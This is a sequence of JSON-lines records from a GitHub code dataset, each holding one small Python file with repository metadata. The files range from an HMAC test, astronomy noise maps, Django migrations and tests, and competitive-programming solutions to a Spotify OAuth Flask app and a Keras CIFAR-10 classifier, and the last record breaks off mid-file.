'9oJnkH8gr3l7UXYlGf3XYEyXKvpf6z0F6w1fJ4aYh5c='.encode('utf-8')\n #print(computed_mac) # 9oJnkH8gr3l7UXYlGf3XYEyXKvpf6z0F6w1fJ4aYh5c=\n result = hmac.compare_digest(computed_mac, expected_result)\n self.assertEqual(computed_mac, expected_result)\n self.assertTrue(result)\n\n def test_hmac_simple(self):\n simple_payload = '{\"event\": \"SERVER_UPDATE\"}'\n\n hmac_result = hmac.new(\n self.API_SECRET_KEY.encode('utf-8'),\n simple_payload.encode('utf-8'),\n digestmod=hashlib.sha256)\n\n hmac_digest = hmac_result.digest()\n\n computed_mac = base64.b64encode(hmac_digest)\n expected_result = 'SgS9OYxlwwM75ttkEJSrMJvVpoXTLrHkWQAJrgFx7LY='.encode('utf-8')\n\n result = hmac.compare_digest(computed_mac, expected_result)\n self.assertEqual(computed_mac, expected_result)\n self.assertTrue(result)","repo_name":"RobertaBtt/adaptive-python-service","sub_path":"tests/utilities/test_hmac_encryption.py","file_name":"test_hmac_encryption.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26330730745","text":"import healpy as hp\nimport numpy as np\n\n# Add SPT noise, chi-by-eye to Henning SPT-500deg^2 paper N_l and\n# functional form in http://users.physics.harvard.edu/~buza/20161220_chkS4/\n\n#sigmap = 9.0 # uK-arcmin, SPT\nsigmap = 1.2 # uK-arcmin, CMB-S4\n\nlknee = 250.\nlexp = -1.8\n\nl = np.arange(8000)*1.0\nNl = 4*np.pi / (41253.*60**2) * (1+(l/lknee)**(lexp)) * sigmap**2\nNl[0] = 0\n\n# Get noise realization\nNside = 1024\n\nfor rlz in range(26,100):\n\n print(rlz)\n\n hmapTn = hp.synfast(Nl, Nside, new=True, verbose=False)\n hmapQn = hp.synfast(Nl, Nside, new=True, verbose=False)\n hmapUn = hp.synfast(Nl, Nside, new=True, verbose=False)\n\n hp.write_map('input_maps/S4_noise_map_r{:04d}.fits'.format(rlz),[hmapTn,hmapQn,hmapUn])\n\n\n","repo_name":"csheehy/cpmdeproj","sub_path":"scripts/maketempnoisemap.py","file_name":"maketempnoisemap.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10285130828","text":"#!/usr/bin/env python\ndef primes():\n candidates = [2]\n p = 3\n\n while p <= 2000000:\n prime = True\n for candidate in candidates:\n if p % candidate == 0:\n prime = False\n break\n\n if prime:\n candidates.append(p)\n\n p += 2\n\n return candidates\n\nprint(sum(primes()))\n","repo_name":"chiwanpark/project-euler","sub_path":"src/prob00010.py","file_name":"prob00010.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30547596175","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.utils.timezone\nimport cms.models.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('cms', '0016_auto_20160608_1535'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='JobOffer',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('active', models.BooleanField(default=False, help_text='Zaznacz jezeli chcesz opublikowac ogloszenie', verbose_name=b'Aktywne Tak/Nie')),\n ('pub_date', models.DateField(default=django.utils.timezone.now, verbose_name=b'data publikacji')),\n ('position_pl', models.CharField(max_length=200, verbose_name=b'stanowisko PL')),\n ('position_en', models.CharField(max_length=200, verbose_name=b'stanowisko EN')),\n ('city', models.CharField(max_length=200, verbose_name=b'Miasto')),\n ('slug', models.SlugField(default=b'')),\n ('content_en', cms.models.fields.PlaceholderField(related_name='job_offer_EN', slotname=b'content_en', editable=False, to='cms.Placeholder', null=True)),\n ('content_pl', cms.models.fields.PlaceholderField(related_name='job_offer_PL', slotname=b'content_pl', editable=False, to='cms.Placeholder', null=True)),\n ],\n ),\n ]\n","repo_name":"rapapor/djcms","sub_path":"apps/job/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11372132931","text":"from app.enhancer.data_miner.database.utility import DatabaseUtility\n\nblacklist_inputs = [None,\"\"]\nclass DatabaseHandler:\n def __init__(self):\n self._db_util = DatabaseUtility()\n for k,v in self._db_util.db_mapping_calls.items():\n setattr(DatabaseHandler, k, k)\n \n def get(self,identity,timeout=10,db_name=None):\n if identity in blacklist_inputs:\n return None\n if str.isdigit(identity):\n return None\n if db_name is not None:\n dbs = [db_name]\n else:\n dbs = self._get_potential_db_names(identity)\n\n for db in dbs:\n record = self._db_util.get(identity,db_name=db,timeout=timeout)\n if record is not None:\n return record\n return None\n\n def count(self,query):\n for db in self._db_util.db_mapping_calls.keys():\n yield self._db_util.count(query,db)\n\n def query(self,query,lazy=False):\n if lazy:\n for db in self._db_util.db_mapping_calls.keys():\n res = self._db_util.query(query,db)\n if len(res) > 0:\n yield res\n return\n else:\n for db in self._db_util.db_mapping_calls.keys():\n yield self._db_util.query(query,db)\n\n def is_record(self,identity):\n for db in self._db_util.db_mapping_calls.keys():\n if self._db_util.is_record(identity,db):\n return True\n return False\n\n def sequence_search(self,seqeunce,similarity=None,db_name=None):\n if db_name is not None:\n dbs = [db_name]\n else:\n dbs = self._db_util.db_mapping_calls.keys()\n for db in dbs:\n s = self._db_util.sequence(seqeunce,db,similarity=similarity)\n if s is not None and len(s) > 0:\n return s\n return None\n\n def get_uri(self,name):\n for db in self._db_util.db_mapping_calls.keys():\n s = self._db_util.get_uri(name,db)\n if s != []:\n return s[0]\n return None\n \n def find_uses(self):\n pass\n\n def get_metadata_identifiers(self):\n return self._db_util.get_metadata_identifiers()\n\n def download_igem_parts(self,out_fn):\n return self._db_util.db_mapping_calls[\"synbiohub\"].download_igem_parts(out_fn)\n \n def get_vpr_data(self,out_fn):\n return self._db_util.db_mapping_calls[\"synbiohub\"].get_vpr_data(out_fn)\n \n def _get_potential_db_names(self,identity):\n potential_codes = self._db_util.get_potential_db_names(identity)\n if len(potential_codes) == 0:\n return list(self._db_util.db_mapping_calls.keys())\n return potential_codes\n","repo_name":"intbio-ncl/genet2","sub_path":"app/enhancer/data_miner/database/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":2747,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"31539434239","text":"def resolve():\n N = int(input())\n D = [int(e) for e in input().split()]\n\n ans = 0\n for month, days in enumerate(D, 1):\n for d in range(1, days + 1):\n ss = str(month) + str(d)\n for s in ss:\n if s != ss[0]: break\n else:\n ans += 1\n\n print(ans)\n\n# resolve()\n# exit()\n\nimport sys\nfrom io import StringIO\nimport unittest\n\n\nclass TestClass(unittest.TestCase):\n def assertIO(self, input, output):\n stdout, stdin = sys.stdout, sys.stdin\n sys.stdout, sys.stdin = StringIO(), StringIO(input)\n resolve()\n sys.stdout.seek(0)\n out = sys.stdout.read()[:-1]\n sys.stdout, sys.stdin = stdout, stdin\n self.assertEqual(out, output)\n\n def test_入力例_1(self):\n input = \"\"\"12\n31 29 31 30 31 30 31 31 30 31 30 31\"\"\"\n output = \"\"\"13\"\"\"\n self.assertIO(input, output)\n\n def test_入力例_2(self):\n input = \"\"\"10\n10 1 2 3 4 5 6 7 8 100\"\"\"\n output = \"\"\"1\"\"\"\n self.assertIO(input, output)\n\n def test_入力例_3(self):\n input = \"\"\"30\n73 8 55 26 97 48 37 47 35 55 5 17 62 2 60 23 99 73 34 75 7 46 82 84 29 41 32 31 52 32\"\"\"\n output = \"\"\"15\"\"\"\n self.assertIO(input, output)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"koba925/alds","sub_path":"atcoder/ABC328/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"467529199","text":"# coding: utf8\nfrom __future__ import unicode_literals, absolute_import, division, print_function\n\nimport pytest\nfrom hamcrest import assert_that, has_entries, contains_inanyorder, has_properties\n\nfrom common.models.geo import Station2Settlement, StationMajority\nfrom common.models.schedule import RTStation\nfrom common.tester.factories import create_station, create_settlement, create_thread\nfrom common.utils.settlement import fetch_station_settlement_ids, fill_best_rts_for_settlement, \\\n fetch_station_settlement_ids_with_none\n\n\n@pytest.mark.dbuser\ndef test_fetch_station_settlement_ids():\n station = create_station(settlement=create_settlement())\n settlement = create_settlement()\n Station2Settlement.objects.create(station=station, settlement=settlement)\n station_without_settlement = create_station()\n\n station_settlement_ids = fetch_station_settlement_ids()\n\n assert_that(station_settlement_ids, has_entries({\n station.id: contains_inanyorder(station.settlement.id, settlement.id),\n }))\n assert station_without_settlement not in station_settlement_ids\n\n\n@pytest.mark.dbuser\ndef test_fetch_station_settlement_ids_with_none():\n station = create_station(settlement=create_settlement())\n settlement = create_settlement()\n Station2Settlement.objects.create(station=station, settlement=settlement)\n station_without_settlement = create_station()\n\n station_settlement_ids = fetch_station_settlement_ids_with_none()\n\n assert_that(station_settlement_ids, has_entries({\n station.id: contains_inanyorder(station.settlement.id, settlement.id),\n station_without_settlement.id: contains_inanyorder(None),\n }))\n\n\n@pytest.mark.dbuser\ndef test_fill_best_rts_for_settlement():\n settlement = create_settlement()\n settlement2 = create_settlement()\n stations = [create_station(majority=StationMajority.IN_TABLO_ID),\n create_station(settlement=settlement, majority=StationMajority.IN_TABLO_ID),\n create_station(settlement=settlement, majority=StationMajority.MAIN_IN_CITY_ID),\n create_station(settlement=settlement, majority=StationMajority.IN_TABLO_ID),\n create_station(settlement=settlement, majority=StationMajority.MAIN_IN_CITY_ID),\n create_station(majority=StationMajority.IN_TABLO_ID),\n create_station(settlement=settlement, majority=StationMajority.IN_TABLO_ID),\n create_station(settlement=settlement2, majority=StationMajority.IN_TABLO_ID)]\n settlement3 = create_settlement()\n Station2Settlement.objects.create(station=stations[-1], settlement=settlement3)\n thread = create_thread(\n schedule_v1=[\n [None, 0, stations[0]],\n [10, 20, stations[1]],\n [30, 40, stations[2]],\n [50, 60, stations[3]],\n [70, 80, stations[4]],\n [90, 100, stations[5]],\n [110, 120, stations[6]],\n [130, None, stations[7]],\n ]\n )\n rts_from, rts_to = fill_best_rts_for_settlement(RTStation.objects.filter(thread=thread))\n assert_that(rts_from, has_entries({\n settlement.id: has_properties(id=RTStation.objects.get(thread=thread, station=stations[4]).id),\n }))\n assert_that(rts_to, has_entries({\n settlement.id: has_properties(id=RTStation.objects.get(thread=thread, station=stations[2]).id),\n settlement2.id: has_properties(id=RTStation.objects.get(thread=thread, station=stations[-1]).id),\n settlement3.id: has_properties(id=RTStation.objects.get(thread=thread, station=stations[-1]).id),\n }))\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"travel/tests/utils/test_settlement.py","file_name":"test_settlement.py","file_ext":"py","file_size_in_byte":3599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7269318027","text":"import re\nimport itertools\nfrom collections import defaultdict\n\ndef scores_as_table(entry_list, top_n = 20):\n entry_list.sort(key = lambda x: x['composite_score'], reverse = True)\n headers = [i for i in itertools.chain.from_iterable([['title'], ['composite_score'], ['snp_burden'], \n entry_list[0]['blast_scores'].keys(), [\"coverage_score\"]])]\n lines = [ [ [s['title']], [s['composite_score']], [s['snp_burden']], \n s['blast_scores'].values(), [s['coverage_score']]] for s in entry_list[:top_n] ]\n top_entries = [headers]\n for line in lines:\n entry = [i for i in itertools.chain.from_iterable(line)]\n top_entries.append(entry)\n return top_entries\n\ndef write_table(entry_list, file_name):\n import csv\n scores_table = scores_as_table(entry_list)\n with open(file_name, 'w') as f:\n w = csv.writer(f, delimiter ='\\t')\n w.writerows(scores_table)\n\ndef test_heuristic(annotation_report, file_name, blast_max = 20, snp_max = 20, coverage_max = 20,\n var_score_dict=None, blast_value = 2, coverage_value = 1):\n annotation_report.score_all_entries(blast_max, snp_max, coverage_max,\n var_score_dict, blast_value, coverage_value)\n sdata = sorted([g for g in annotation_report], key=lambda x: x['composite_score'], reverse=True)\n write_table(sdata, \"test_heuristic-snp-%d-blast-%d-%d-cov-%d-%d.tsv\" % (snp_max, blast_value, blast_max, coverage_value, coverage_max))\n\n\n\n\n# if missense moderate, 1, if high, 2, based on snpEff? let frame_shift be just high (2)?\n# Assume UNKNOWN is missense\n# Add a limit on how many mutations can contribute?\n# Split score into variant_score (\"snp_burden\") and blast hits (\"drug burden\")\n# Normalize snp_burden by sequence size\n# Add tapering for redundant blast hits.\n# split drugbank and card # done\n# Max all by 20 and don't normalize by gene size?\n# Composite score gets extra multiplier?\n# Add weight by allele frequency?\ndef score_heuristic_cap(entry, blast_max = 20, snp_max = 20, coverage_max = 20,\n var_score_dict=None, blast_value = 2, coverage_value = 1, \n ignore_filter_set = None):\n if ignore_filter_set is None:\n ignore_filter_set = set()\n else:\n ignore_filter_set = set(ignore_filter_set)\n if var_score_dict is None:\n var_score_dict = {\"LOW\": 0.1, \"UNKNOWN\": 1,\"MODERATE\": 1, \"MODIFIER\": 1, \"HIGH\": 2}\n\n variant_score = 0\n for variant in entry[\"variants\"]:\n if len(set(variant[\"filters\"]) - ignore_filter_set) == 0:\n variant_score += var_score_dict[variant[\"eff\"].get(\"impact\", \"UNKNOWN\")]\n\n entry['snp_burden'] = variant_score\n composite = max(min(variant_score, snp_max), 1)\n\n # If no variants were accepted, then this gene shouldn't be considered based on its\n # overall composite score. Other scores are calculated, but the composite will be 0\n if variant_score == 0:\n composite = 0\n\n blast_db_scores = defaultdict(int)\n current_db = \"UNKNOWN\"\n for blast_db, blast_hits in entry['blast_hits'].items():\n if re.search(\"drugbank\", blast_db):\n current_db = 'drugbank'\n elif re.search(\"comprehensive_antibiotic\", blast_db):\n current_db = \"card\"\n else:\n current_db = \"UNKNOWN\"\n for hit in blast_hits:\n blast_db_scores[current_db + \"_score\"] += 1\n\n entry['blast_scores'] = blast_db_scores\n \n blast_total = 0\n for blast_db, score in blast_db_scores.items():\n blast_total += min(score * blast_value, blast_max)\n\n composite *= max(blast_total, 1)\n\n coverage_score = 0\n for region in entry['uncovered_regions']:\n coverage_score += coverage_value\n\n entry['coverage_score'] = coverage_score\n\n composite *= max(min(coverage_score, coverage_max), 1)\n\n entry['composite_score'] = composite\n return entry\n\n\n\ndef overfit_score_heuristic(entry, snp_score = .1, missense_score = 2, frame_shift_score = 2/3.0, min_quality = 20, \\\n blast_hit_score = 2, multi_drug_bonus = 2, uncov_region_score = 2):\n variant_score = 1\n seq_len = float(entry['end'] - entry['start'])\n for variant in entry[\"variants\"]:\n if variant['call_quality'] < min_quality:\n continue\n if variant[\"eff\"][\"type\"] in [\"UNKNOWN\", \"SYNONYMOUS_CODING\", \"INTERGENIC\"]:\n variant_score += snp_score\n\n elif variant[\"eff\"][\"type\"] in [\"NON_SYNONYMOUS_CODING\", \"NON_SYNONYMOUS_START\", \\\n \"SYNONYMOUS_STOP\", \"NON_SYNONYMOUS_STOP\"]:\n variant_score += missense_score\n\n elif variant[\"eff\"][\"type\"] in [\"STOP_GAINED\", \"STOP_LOST\", \"START_LOST\", \"RARE_AMINO_ACID\"]:\n variant_score += seq_len/3.0 * min(seq_len / 2000, 1)\n\n elif variant[\"eff\"][\"type\"] in [\"FRAME_SHIFT\", \"SPLICE_SITE_ACCEPTOR\", \"SPLICE_SITE_DONOR\"]:\n start_point = variant['start'] - entry['start']\n percent_shift = (start_point / seq_len)\n # The earlier the shift occurs, the greater the score multiplier, \n # but penalize short sequences ( < 1000 bp) \n score = (frame_shift_score / percent_shift) * min(seq_len / 2000, 1)\n variant_score += score\n #variant_score += frame_shift_score\n else:\n print(\"Variant Effect Not Recognized: %s\" % variant[\"eff\"][\"type\"])\n \n blast_score = 1\n for blast_db, blast_hits in entry['blast_hits'].items():\n for hit in blast_hits:\n blast_score += blast_hit_score\n if re.search(r'multidrug', hit['hit_def'], re.IGNORECASE):\n blast_score += multi_drug_bonus\n\n coverage_score = 1\n for region in entry[\"uncovered_regions\"]:\n # if(entry['mean_coverage'] == 0):\n # uncov_region_score * --\n coverage_score += uncov_region_score\n\n entry[\"score\"] = variant_score * blast_score * coverage_score\n return entry","repo_name":"PathoScope/PathoVar","sub_path":"pathovar/snp_annotation/scoring_heuristic.py","file_name":"scoring_heuristic.py","file_ext":"py","file_size_in_byte":5952,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15824338481","text":"from django.conf.urls import url, include\nfrom django.contrib import admin\nfrom . import views\n\napp_name = 'top'\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^signup/', views.signup, name='signup'),\n url(r'^policy/', views.policy, name='policy'),\n url(r'^privacy/', views.privacy, name='privacy'),\n]\n","repo_name":"yasunt/famo","sub_path":"top/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19138372660","text":"from dotenv import load_dotenv\nfrom requests import post, get\nimport os\nimport base64\nimport json\nimport secrets\nimport string\nfrom flask import (\n Flask,\n render_template,\n request,\n make_response,\n redirect,\n session,\n url_for,\n)\nfrom urllib.parse import urlencode\n\nAUTH_URL = \"https://accounts.spotify.com/authorize\"\nTOKEN_URL = \"https://accounts.spotify.com/api/token\"\nBASE_URL = \"https://api.spotify.com/v1/me\"\n\nload_dotenv()\n\nREDIRECT_URI = os.getenv(\"REDIRECT_URI\")\nCLIENT_ID = os.getenv(\"CLIENT_ID\")\nCLIENT_SECRET = os.getenv(\"CLIENT_SECRET\")\n\nauth_string = f\"{CLIENT_ID}:{CLIENT_SECRET}\"\nauth_bytes = auth_string.encode(\"utf-8\")\nauth_base64 = str(base64.b64encode(auth_bytes), \"utf-8\")\nAUTHORIZATION_HEADER = {\n \"Authorization\": \"Basic \" + auth_base64,\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n}\n\napp = Flask(__name__)\napp.secret_key = os.getenv(\"SECRET_KEY\")\n\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n\n@app.route(\"/login\")\ndef login():\n state = \"\".join(\n secrets.choice(string.ascii_uppercase + string.digits) for _ in range(16)\n )\n scope = \"user-top-read user-read-private user-read-email\"\n payload = {\n \"client_id\": CLIENT_ID,\n \"response_type\": \"code\",\n \"redirect_uri\": REDIRECT_URI,\n \"state\": state,\n \"scope\": scope,\n }\n\n r = make_response(redirect(f\"{AUTH_URL}/?{urlencode(payload)}\"))\n r.set_cookie(\"auth_state\", state)\n return r\n\n\n@app.route(\"/callback\")\ndef callback():\n code = request.args.get(\"code\")\n state = request.args.get(\"state\")\n stored_state = request.cookies.get(\"auth_state\")\n\n payload = {\n \"grant_type\": \"authorization_code\",\n \"code\": code,\n \"redirect_uri\": REDIRECT_URI,\n }\n\n r = post(TOKEN_URL, headers=AUTHORIZATION_HEADER, data=payload)\n r_data = json.loads(r.content)\n\n session[\"tokens\"] = {\n \"access_token\": r_data.get(\"access_token\"),\n \"refresh_token\": r_data.get(\"refresh_token\"),\n }\n\n return redirect(url_for(\"user\"))\n\n\n@app.route(\"/refresh\")\ndef refresh():\n headers = {\n \"Authorization\": AUTHORIZATION_HEADER,\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n }\n payload = {\n \"grant_type\": \"refresh_token\",\n \"refresh_token\": session[\"tokens\"].get(\"refresh_token\"),\n }\n\n r = post(TOKEN_URL, headers=headers, data=payload)\n r_data = json.loads(r.content)\n\n session[\"tokens\"][\"access_token\"] = r_data.get(\"access_token\")\n\n return json.dumps(session[\"tokens\"])\n\n\n@app.route(\"/user\")\ndef user():\n headers = {\"Authorization\": f\"Bearer {session['tokens'].get('access_token')}\"}\n\n r_user = get(BASE_URL, headers=headers)\n user_data = json.loads(r_user.content)\n\n r_top_artists = get(url=f\"{BASE_URL}/top/artists\", headers=headers)\n top_artists_data = json.loads(r_top_artists.content)\n r_top_tracks = get(url=f\"{BASE_URL}/top/tracks\", headers=headers)\n top_tracks_data = json.loads(r_top_tracks.content)\n\n top_artists = []\n for artist in top_artists_data[\"items\"]:\n artist_info = {}\n artist_info[\"name\"] = artist[\"name\"]\n genres = \"\"\n for genre in artist[\"genres\"]:\n genres = genres + f\"{genre}, \"\n genres = genres[:-2]\n if genres == \"\":\n genres = \"no genre listed\"\n artist_info[\"genres\"] = genres\n top_artists.append(artist_info)\n print(top_artists)\n\n tracks = []\n for track in top_tracks_data[\"items\"]:\n track_info = {}\n track_info[\"name\"] = track[\"name\"]\n artists = \"\"\n for artist in track[\"artists\"]:\n artists = artists + f\"{artist['name']}, \"\n artists = artists[:-2]\n track_info[\"artists\"] = artists\n tracks.append(track_info)\n\n data = {\n \"user_name\": user_data[\"display_name\"],\n \"user_country\": user_data[\"country\"],\n \"user_profile_pic\": user_data[\"images\"][0][\"url\"],\n \"top_artists\": top_artists,\n \"top_tracks\": tracks,\n }\n\n return render_template(\"user.html\", data=data, tokens=session.get(\"tokens\"))\n\n\n@app.route(\"/\")\ndef top(top_items):\n top_type = \"\"\n if top_items == \"top_artists\":\n top_type = \"artists\"\n elif top_items == \"top_tracks\":\n top_type = \"tracks\"\n\n headers = {\"Authorization\": f\"Bearer {session['tokens'].get('access_token')}\"}\n\n r = get(url=f\"{BASE_URL}/top/{top_type}\", headers=headers)\n r_data = json.loads(r.content)\n return render_template(\"top_items.html\", data=r_data, tokens=session.get(\"tokens\"))\n\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"nghicaps/Spotify-API","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15473586779","text":"import calendar\nfrom datetime import date\n#calendar é um módulo que fornece funções relacionadas ao calendário\nano = int(input('Digite o ano e descubra se ele é bissexto. Digite 0 para analisar o ano atual: '))\nano2 = calendar.isleap(ano)\nif ano == 0:\n ano = date.today().year\nif ano2 == True:\n print(f'{ano} é um ano bissexto!')\nelse:\n print(f'{ano} não é ano bissexto!')\n\n'''\n\n#OUTRO JEITO DE FAZER O CÓDIGO:\n\nfrom datetime import date\nano = int(input('Digite o ano e descubra se ele é bissexto. Digite 0 para analisar o ano atual: '))\nif ano == 0:\n ano = date.today().year\nif ano % 4 == 0 and ano % 100 != 0 or ano % 400 == 0:\n print(f'O ano {ano} é um ano bissexto!')\nelse:\n print(f'O ano {ano} não é bissexto!')\n'''","repo_name":"rodrigosilvanew/pythonexercicios-guanabara","sub_path":"ex032.py","file_name":"ex032.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70539085993","text":"# 문제: https://www.acmicpc.net/problem/9461\n# P(N) = P(N-1) + P(N-5)\nimport sys\ninput = sys.stdin.readline\nm = [0, 1, 1, 1, 2, 2, 3, 4, 5, 7, 9]\nmax = 10\nt = int(input())\nfor _ in range(t):\n n = int(input())\n if n > max:\n for k in range(max + 1, n+1):\n max += 1\n m.append(m[k-1] + m[k-5])\n print(m[n])\n \n","repo_name":"fbghgus123/algorithm","sub_path":"python/백준/DP/9461_파도반수열.py","file_name":"9461_파도반수열.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"1944045986","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nimport tensorflow as tf\n\n\nfrom tensorflow.keras import datasets, models, layers, backend\n\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D, Dense, Flatten\n\nfrom tensorflow.keras import Model\n\nimport matplotlib.pyplot as plt\n\nimport os\n\nos.environ['KMP_DUPLICATE_LIB_OK']='True'\n\n\n(train_images, train_labels), (test_images, test_labels) = datasets.cifar10.load_data()\ntrain_images, test_images = train_images / 255.0, test_images / 255.0\n\n# Resize images?\n#trains_images = backend.resize_images(train_images, (224, 224))\n\nprint(\"Train: X=%s, y=%s\" % (train_images.shape, train_labels.shape)) \nprint(\"Test: X=%s, y=%s\" % (test_images.shape, test_labels.shape))\n\n\nclass_names = ['airplane', 'automobile', 'bird', 'cat', 'deer',\n 'dog', 'frog', 'horse', 'ship', 'truck']\n\n\n\"\"\"\nplt.figure(figsize=(10,10))\nfor i in range(25):\n plt.subplot(5,5,i+1)\n plt.xticks([])\n plt.yticks([])\n plt.grid(False)\n plt.imshow(train_images[i], cmap=plt.cm.binary)\n # The CIFAR labels happen to be arrays, \n # which is why you need the extra index\n plt.xlabel(class_names[train_labels[i][0]])\nplt.show()\n\"\"\"\n\nmodel = models.Sequential()\n\nmodel.add(layers.Conv2D(16, (3, 3), activation='relu', input_shape=(32, 32, 3), padding='same'))\nmodel.add(layers.BatchNormalization())\n\nmodel.add(layers.Conv2D(16, (3, 3), activation='relu', padding='same'))\nmodel.add(layers.BatchNormalization())\n\n# 1 pooling layer\nmodel.add(layers.MaxPooling2D((2, 2)))\nmodel.add(layers.Dropout(0.2))\n\n# 2 Convolutional Layers\nmodel.add(layers.Conv2D(32, (3, 3), activation='relu', padding='same'))\nmodel.add(layers.BatchNormalization())\n\nmodel.add(layers.Conv2D(32, (3, 3), activation='relu', padding='same'))\nmodel.add(layers.BatchNormalization())\n\n# 1 Pooling Layer\nmodel.add(layers.MaxPooling2D((2, 2)))\nmodel.add(layers.Dropout(0.3))\n\n# 2 Convolutional Layers\nmodel.add(layers.Conv2D(64, (3, 3), activation='relu', padding='same'))\nmodel.add(layers.BatchNormalization())\nmodel.add(layers.Conv2D(64, (3, 3), activation='relu', padding='same'))\nmodel.add(layers.BatchNormalization())\n\n# 1 Pooling Layer\nmodel.add(layers.MaxPooling2D(2,2))\nmodel.add(layers.Dropout(0.4))\n\n# 4 Convolutional Layers\nmodel.add(layers.Conv2D(64, (3, 3), activation='relu', padding='same'))\nmodel.add(layers.BatchNormalization())\nmodel.add(layers.Conv2D(64, (3, 3), activation='relu',padding='same'))\nmodel.add(layers.BatchNormalization())\n\n\nmodel.add(layers.MaxPooling2D(2,2))\nmodel.add(layers.Dropout(0.5))\n\n\nmodel.add(layers.Flatten())\nmodel.add(layers.Dense(64, activation='relu'))\nmodel.add(layers.Dense(10, activation='softmax'))\n\nmodel.summary()\n\n\n# Compile our model\nmodel.compile(optimizer='adam',\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy'])\n\nhistory = model.fit(train_images, train_labels, batch_size=10, epochs=10, \n validation_data=(test_images, test_labels))\n\ntest_loss, test_acc = model.evaluate(test_images, test_labels, verbose=2)\n\nprint(\"This is test accuracy: \" + str(test_acc))\n\n\"\"\"\nclass vgg19(Model):\n def __init__(self):\n super(vgg19, self).__init__()\n self.conv1 = Conv2D(32, (3,3), activation='relu')\n self.conv2 = Conv2D(64, (3,3), activation='relu')\n self.pool = MaxPooling2D(2,2)\n self.flatten = Flatten()\n self.d1 = Dense(128, activation='relu')\n self.d2 = Dense(10, activation='softmax')\n \n def call(self, x):\n x = self.conv1(x)\n x = self.pool(x)\n x = self.conv2(x)\n x = self.pool(x)\n x = self.conv2(x)\n\n x = self.flatten(x)\n x = self.d1(x)\n x = self.d2(x)\n\nmodel = vgg19()\n\"\"\"\n","repo_name":"kyletran200/Tensorflow_Classifiers","sub_path":"vgg_classifier.py","file_name":"vgg_classifier.py","file_ext":"py","file_size_in_byte":3750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37998931144","text":"import datetime\nfrom typing import Any, Dict, List, Type, TypeVar, Union\n\nimport attr\nfrom dateutil.parser import isoparse\n\nfrom ..models.report_data import ReportData\nfrom ..models.report_report_type import ReportReportType\nfrom ..models.report_result import ReportResult\nfrom ..types import UNSET, Unset\n\nT = TypeVar(\"T\", bound=\"Report\")\n\n\n@attr.s(auto_attribs=True)\nclass Report:\n \"\"\"\n Attributes:\n type (str):\n uuid (Union[Unset, str]): The UUID that can be used to identify the report.\n title (Union[Unset, str]): The title of the report.\n details (Union[Unset, str]): A string to describe the purpose of the report.\n external_id (Union[Unset, str]): ID of the report provided by the report creator. It can be used to identify the\n report as an alternative to it's generated uuid. It is not used by Bitbucket, but only by the report creator for\n updating or deleting this specific report. Needs to be unique.\n reporter (Union[Unset, str]): A string to describe the tool or company who created the report.\n link (Union[Unset, str]): A URL linking to the results of the report in an external tool.\n remote_link_enabled (Union[Unset, bool]): If enabled, a remote link is created in Jira for the issue associated\n with the commit the report belongs to.\n logo_url (Union[Unset, str]): A URL to the report logo. If none is provided, the default insights logo will be\n used.\n report_type (Union[Unset, ReportReportType]): The type of the report.\n result (Union[Unset, ReportResult]): The state of the report. May be set to PENDING and later updated.\n data (Union[Unset, List[ReportData]]): An array of data fields to display information on the report. Maximum 10.\n created_on (Union[Unset, datetime.datetime]): The timestamp when the report was created.\n updated_on (Union[Unset, datetime.datetime]): The timestamp when the report was updated.\n \"\"\"\n\n type: str\n uuid: Union[Unset, str] = UNSET\n title: Union[Unset, str] = UNSET\n details: Union[Unset, str] = UNSET\n external_id: Union[Unset, str] = UNSET\n reporter: Union[Unset, str] = UNSET\n link: Union[Unset, str] = UNSET\n remote_link_enabled: Union[Unset, bool] = UNSET\n logo_url: Union[Unset, str] = UNSET\n report_type: Union[Unset, ReportReportType] = UNSET\n result: Union[Unset, ReportResult] = UNSET\n data: Union[Unset, List[ReportData]] = 